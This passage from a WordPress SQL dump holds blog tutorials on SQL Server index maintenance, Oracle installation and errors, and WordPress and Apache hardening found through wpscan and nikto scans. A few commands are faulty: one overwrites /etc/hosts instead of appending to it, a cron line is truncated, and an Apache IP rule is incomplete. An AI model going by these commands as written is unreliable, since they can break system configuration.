indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nDECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n\n<!-- /wp:syntaxhighlighter/code --> ','Rebuild and Reorganize all indexes within a database','','inherit','closed','closed','','66-revision-v1','','','2020-03-23 16:55:18','2020-03-23 16:55:18','',66,'http://ictbank.ir/blog/index.php/2020/03/23/66-revision-v1/',0,'revision','',0),
(140,2,'2020-03-23 16:55:27','2020-03-23 16:55:27','<!-- wp:paragraph -->\n<p>To see the progress of Backup or Restore process you can use this query: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nSELECT r.session_id AS [Session_Id]\n ,r.command AS [command]\n ,CONVERT(NUMERIC(6, 2), r.percent_complete) AS [% Complete]\n ,GETDATE() AS [Current Time]\n ,CONVERT(VARCHAR(20), DATEADD(ms, r.estimated_completion_time, GetDate()), 20) AS [Estimated Completion Time]\n ,CONVERT(NUMERIC(32, 2), r.total_elapsed_time / 1000.0 / 60.0) AS [Elapsed Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0) AS [Estimated Min]\n ,CONVERT(NUMERIC(32, 2), r.estimated_completion_time / 1000.0 / 60.0 / 60.0) AS [Estimated Hours]\n ,CONVERT(VARCHAR(1000), (\n SELECT SUBSTRING(TEXT, r.statement_start_offset / 2, CASE\n WHEN r.statement_end_offset = - 1\n THEN 1000\n ELSE (r.statement_end_offset - r.statement_start_offset) / 2\n END) \'Statement text\'\n FROM sys.dm_exec_sql_text(sql_handle)\n ))\nFROM sys.dm_exec_requests r\nWHERE command like \'RESTORE%\'\nor command like \'BACKUP%\'\n<!-- /wp:syntaxhighlighter/code --> ','Backup/Restore Progress','','inherit','closed','closed','','64-revision-v1','','','2020-03-23 16:55:27','2020-03-23 16:55:27','',64,'http://ictbank.ir/blog/index.php/2020/03/23/64-revision-v1/',0,'revision','',0),
(141,2,'2020-03-23 16:55:36','2020-03-23 16:55:36','<!-- wp:paragraph -->\n<p>If you see <strong>Fatal NI connect error 12547</strong> error in alert log file of a Database in the middle of startup, and the database process couldn\'t find <strong>DB PARAMETER FILE</strong> and <strong>CONTROL FILE</strong>, you have to check permissions,owner and group of these files: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nls -l $GRID_HOME/bin/oracle\nls -l $ORACLE_HOME/bin/oracle\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>The permission of these files have to be <strong>6751</strong>.<br> The group of these files have to be <strong>oinstall</strong><br> The owner of first file have to be <strong>grid</strong> and the owner of second one have to be <strong>oracle</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\nchown grid:oinstall $GRID_HOME/bin/oracle\nchmod 6751 $GRID_HOME/bin/oracle\n\nchown oracle:oinstall $ORACLE_HOME/bin/oracle\nchmod 6751 $ORACLE_HOME/bin/oracle\n<!-- /wp:syntaxhighlighter/code --> ','Database Startup Error: Fatal NI connect error 12547','','inherit','closed','closed','','60-revision-v1','','','2020-03-23 16:55:36','2020-03-23 16:55:36','',60,'http://ictbank.ir/blog/index.php/2020/03/23/60-revision-v1/',0,'revision','',0),
(142,2,'2020-03-23 16:55:45','2020-03-23 16:55:45','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\" ORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">DECLARE\n CURSOR C1 IS\n SELECT * FROM SEMANTICS$;\n V_STATEMENT VARCHAR2(255);\n V_NC NUMBER(10);\n V_NT NUMBER(10);\nBEGIN\n EXECUTE IMMEDIATE \'SELECT COUNT(*) FROM SEMANTICS$\'\n INTO V_NC;\n EXECUTE IMMEDIATE \'SELECT COUNT(DISTINCT S_TABLE_NAME) FROM SEMANTICS$\'\n INTO V_NT;\n FOR R1 IN C1 LOOP\n V_STATEMENT := \'ALTER TABLE \' || R1.S_OWNER || \'.\' || R1.S_TABLE_NAME;\n V_STATEMENT := V_STATEMENT || \' MODIFY (\' || R1.S_COLUMN_NAME || \' \';\n V_STATEMENT := V_STATEMENT || R1.S_DATA_TYPE || \'(\' || R1.S_CHAR_LENGTH;\n V_STATEMENT := V_STATEMENT || \' CHAR));\';\n EXECUTE IMMEDIATE V_STATEMENT;\n END LOOP;\n DBMS_OUTPUT.PUT_LINE(\'DONE\');\nEND;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>finally, we you have to import data to these tables: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>DATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n','IMPDP Errors: ORA-02374, ORA-12899','','inherit','closed','closed','','56-revision-v1','','','2020-03-23 16:55:45','2020-03-23 16:55:45','',56,'http://ictbank.ir/blog/index.php/2020/03/23/56-revision-v1/',0,'revision','',0),
(143,2,'2020-03-23 16:55:54','2020-03-23 16:55:54','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-03-23 16:55:54','2020-03-23 16:55:54','',27,'http://ictbank.ir/blog/index.php/2020/03/23/27-revision-v1/',0,'revision','',0),
(150,2,'2020-03-24 21:41:03','2020-03-24 21:41:03','<!-- wp:paragraph -->\n<p>If you scan your Wordpress site with wpscan tool, you would see a message like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[+] http://ictbank.ir/blog/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https://www.iplocation.net/defend-wordpress-from-ddos\n | - https://github.com/wpscanteam/wpscan/issues/1299</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>It means that a hacker can generate a DDOS attack on your host using this URL, cause this URL return a blank page and a 200 HTML Response Code.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, this script will use a considerable amount of RAM and CPU, due to its heavy database queries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So you have to do some workarounds to prevent these problems:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. edit wp-config.php file and add below line to disable running the above script for every visits:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">define(\'DISABLE_WP_CRON\', true);</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>2. create a crontab record for running this script periodically:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">*/10 * * * * /usr/bin/php /path_of_script/wp-cron.php >/dev/null 2>&</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3. secure the script and return a 403 error code. to do so, you have to edit your webservice config file (/etc/httpd/conf/httpd.conf) and add the follow: (123.123.123.123 is your web server ip address)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\"><Directory \"/path_to_your_weblog\">\n Order allow,deny\n Allow from all\n <Files \"wp-cron.php\">\n Require ip 123.123.123\n Require ip 127.0.0.1\n </Files>\n</Directory></pre>\n<!-- /wp:syntaxhighlighter/code --> ','One way to Prevent DDOS attacks in Wordpress','','publish','open','open','','one-way-to-prevent-ddos-attacks-in-wordpress','','','2020-03-30 09:05:48','2020-03-30 09:05:48','',0,'http://ictbank.ir/blog/?p=150',0,'post','',0),
(151,2,'2020-03-24 21:41:03','2020-03-24 21:41:03','<!-- wp:paragraph -->\n<p>If you scan your Wordpress site with wpscan tool, you would see a message like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[+] http://ictbank.ir/blog/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https://www.iplocation.net/defend-wordpress-from-ddos\n | - https://github.com/wpscanteam/wpscan/issues/1299</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>It means that a hacker can generate a DDOS attack on your host using this URL, cause this URL return a blank page and a 200 HTML Response Code.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, this script will use a considerable amount of RAM and CPU, due to its heavy database queries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So you have to do some workarounds to prevent these problems:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. edit wp-config.php file and add below line to disable running the above script for every visits:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">define(\'DISABLE_WP_CRON\', true);</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>2. create a crontab record for running this script periodically:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">*/10 * * * * /usr/bin/php /path_of_script/wp-cron.php >/dev/null 2>&</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3. secure the script and return a 403 error code. to do so, you have to edit your webservice config file (/etc/httpd/conf/httpd.conf) and add the follow: (123.123.123.123 is your web server ip address)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\"><Directory \"/path_to_your_weblog\">\n Order allow,deny\n Allow from all\n <Files \"wp-cron.php\">\n Require ip 123.123.123\n Require ip 127.0.0.1\n </Files>\n</Directory></pre>\n<!-- /wp:syntaxhighlighter/code --> ','One way to Prevent DDOS attacks in Wordpress','','inherit','closed','closed','','150-revision-v1','','','2020-03-24 21:41:03','2020-03-24 21:41:03','',150,'http://ictbank.ir/blog/index.php/2020/03/24/150-revision-v1/',0,'revision','',0),
(188,2,'2020-03-26 00:51:18','2020-03-26 00:51:18','<!-- wp:paragraph -->\n<p>If you scan your Wordpress site with wpscan tool, you would see a message like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[+] http://ictbank.ir/blog/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https://www.iplocation.net/defend-wordpress-from-ddos\n | - https://github.com/wpscanteam/wpscan/issues/1299</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>It means that a hacker can generate a DDOS attack on your host using this URL, cause this URL return a blank page and a 200 HTML Response Code.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, this script will use a considerable amount of RAM and CPU, due to its heavy database queries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So you have to do some workarounds to prevent these problems:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. edit wp-config.php file and add below line to disable running the above script for every visits:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">define(\'DISABLE_WP_CRON\', true);</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>2. create a crontab record for running this script periodically:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">*/10 * * * * /usr/bin/php /path_of_script/wp-cron.php >/dev/null 2>&</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3. secure the script and return a 403 error code. to do so, you have to edit your webservice config file (/etc/httpd/conf/httpd.conf) and add the follow: (123.123.123.123 is your web server ip address)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\"><Directory \"/path_to_your_weblog\">\n Order allow,deny\n Allow from all\n <Files \"wp-cron.php\">\n Require ip 123.123.123\n Require ip 127.0.0.1\n </Files>\n</Directory></pre>\n<!-- /wp:syntaxhighlighter/code --> ','One way to Prevent DDOS attacks in Wordpress','','inherit','closed','closed','','150-revision-v1','','','2020-03-26 00:51:18','2020-03-26 00:51:18','',150,'http://ictbank.ir/blog/index.php/2020/03/26/150-revision-v1/',0,'revision','',0),
(305,2,'2020-03-31 09:39:29','2020-03-31 09:39:29','<!-- wp:paragraph -->\n<p>There are some known security issues that can make an Apache HTTPD Web Server insecure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If using Apache HTTPD as a web service is your approach, then you should scan your web server in first step.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are many tools to scan a web server. here we will use <strong>NIKTO</strong>. Nikto is a free tool which is installed on Kali linux by default.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You can scan your server by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">nikto -h ictbank.ir</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>This command may suggests some issues that you have to handle.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here we will see some of them and try to fix them:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.<strong>The anti-clickjacking X-Frame-Options header is not present.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This vulnerability means that this website could be at risk of a clickjacking attack. (read more: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-x-frame-options-header/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header always append X-Frame-Options SAMEORIGIN</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>You can replace SAMEORIGIN option with one of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>DENY: It completely denies to be loaded in frame/iframe.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>SAMEORIGIN: It allows only if the site which wants to load has a same origin.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>ALLOW-FROM URL: It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>2.<strong>The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the message indicate, this vulnerability can lead to XSS attacks. (read more: https://www.keycdn.com/blog/x-xss-protection)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">header always set X-XSS-Protection \"1; mode=block\"</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3.<strong>The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>with this vulnerability there is a possibility to execute style sheet and steal content from another site through content type doesn’t match (read more: https://geekflare.com/secure-mime-types-in-apache-nginx-with-x-content-type-options/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code 